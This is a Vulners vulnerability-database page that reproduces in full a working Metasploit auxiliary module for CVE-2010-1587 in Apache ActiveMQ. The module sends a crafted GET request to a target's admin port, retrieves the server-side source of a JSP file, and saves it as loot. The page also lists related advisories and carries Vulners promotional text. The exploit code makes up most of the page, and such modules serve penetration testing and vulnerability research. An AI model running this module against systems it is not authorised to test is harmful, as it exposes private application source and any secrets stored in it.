Vulners
Lucene search
Apache ActiveMQ JSP Files Source Disclosure
🗓️ 14 Oct 2012 20:36:02Reported by Veerendra G.G, juan vazquez <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 28 Views
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Security Bulletin: Security vulnerabilities in ActiveMQ 5.2.0 affect IBM Sterling B2B Integrator (CVE-2015-1830, CVE-2014-8110, CVE-2013-3060, CVE-2013-1880, CVE-2013-1879, CVE-2012-6551, CVE-2012-6092, CVE-2010-1587, CVE-2010-1244, CVE-2010-0684) | 16 Jun 201819:48 | – | ibm |
 | Apache ActiveMQ Double Slash Request Source Code Disclosure | 24 Apr 201000:00 | – | nessus |
 | CVE-2010-1587 | 22 Apr 201000:00 | – | circl |
 | CVE-2010-1587 | 28 Apr 201022:00 | – | cve |
 | CVE-2010-1587 | 28 Apr 201022:00 | – | cvelist |
 | Apache ActiveMQ Source Code Disclosure | 18 Mar 201200:00 | – | dsquare |
 | Apache ActiveMQ Sensitive Information Disclosure via the Jetty ResourceHandler | 14 May 202202:45 | – | github |
 | CVE-2010-1587 | 28 Apr 201022:30 | – | nvd |
 | Apache ActiveMQ Source Code Information Disclosure Vulnerability | 23 Apr 201000:00 | – | openvas |
 | GHSA-V2C9-9M8V-8JJM Apache ActiveMQ Sensitive Information Disclosure via the Jetty ResourceHandler | 14 May 202202:45 | – | osv |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache ActiveMQ JSP Files Source Disclosure',
'Description' => %q{
This module exploits a source code disclosure in Apache ActiveMQ. The
vulnerability is due to the Jetty's ResourceHandler handling of specially crafted
URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1
over Windows 2003 SP2 and Ubuntu 10.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Veerendra G.G', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2010-1587' ],
[ 'OSVDB', '64020' ],
[ 'BID', '39636' ],
[ 'URL', 'https://issues.apache.org/jira/browse/AMQ-2700' ]
]
))
register_options(
[
Opt::RPORT(8161),
OptString.new('TARGETURI', [true, 'Path to the JSP file to disclose source code', '/admin/index.jsp'])
])
end
def run_host(ip)
print_status("#{rhost}:#{rport} - Sending request...")
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
})
if res and res.code == 200
contents = res.body
fname = File.basename(datastore['TARGETURI'])
path = store_loot(
'apache.activemq',
'text/plain',
ip,
contents,
fname
)
print_status("#{rhost}:#{rport} - File saved in: #{path}")
else
print_error("#{rhost}:#{rport} - Failed to retrieve file")
return
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jul 2017 13:26Current
0.1Low risk
Vulners AI Score0.1
CVSS 25
EPSS0.78018